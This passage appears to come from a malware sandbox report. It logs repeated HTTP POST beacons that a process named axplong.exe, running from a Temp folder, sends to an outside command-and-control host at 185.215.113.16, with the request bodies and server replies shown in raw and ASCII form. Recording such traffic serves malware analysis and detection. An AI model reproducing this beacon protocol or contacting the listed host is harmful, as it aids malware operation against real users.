                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:46.741858006 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          40192.168.2.455690185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:46.852421999 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:47.553034067 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:47.555301905 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:47.781078100 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          41192.168.2.455691185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:47.899945021 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:48.607697010 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:48.608675003 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:48.841314077 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          42192.168.2.455692185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:48.961951017 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:49.663727045 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:49.664663076 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:49.887764931 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          43192.168.2.455693185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:50.009607077 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:50.718216896 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:50.720468998 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:50.952598095 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          44192.168.2.455694185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:51.071559906 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:51.787897110 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:51.791172981 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:52.044739962 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          45192.168.2.455695185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:52.165045023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:52.860023975 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:52.861165047 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:53.087915897 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          46192.168.2.455696185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:53.196351051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:53.931524992 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:53.935012102 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:54.172363043 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          47192.168.2.455697185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:54.290257931 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:55.040893078 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:55.041682959 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:55.270845890 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          48192.168.2.455698185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:55.384109020 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:56.093096018 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:56.094094992 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:56.320708990 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          49192.168.2.455699185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:56.432461977 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:57.150849104 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:57.153429985 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:57.382288933 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          50192.168.2.455700185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:57.493696928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:58.201766014 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:58.202657938 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:58.435995102 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          51192.168.2.455701185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:58.555748940 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:59.249171972 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:59.250042915 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
